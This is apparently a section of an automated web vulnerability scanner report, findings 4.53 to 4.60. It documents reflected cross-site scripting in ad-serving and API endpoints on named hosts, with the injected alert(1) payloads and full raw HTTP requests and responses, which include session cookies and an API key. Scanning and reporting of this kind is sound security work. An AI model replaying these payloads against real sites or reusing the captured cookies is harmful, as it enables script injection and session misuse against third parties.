GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683560**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1682

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1">
...[SNIP]...

4.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:29:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc
...[SNIP]...

4.57. http://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:29:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)

4.58. http://api.bizographics.com/v1/profile.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:29:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 206
Connection: keep-alive

Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

4.59. https://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: Close

Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)

4.60. http://api.blogburst.com/EntityImageHandler.ashx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/EntityImageHandler.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4387(a)c27091d8173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1
Host: api.blogburst.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:36 GMT
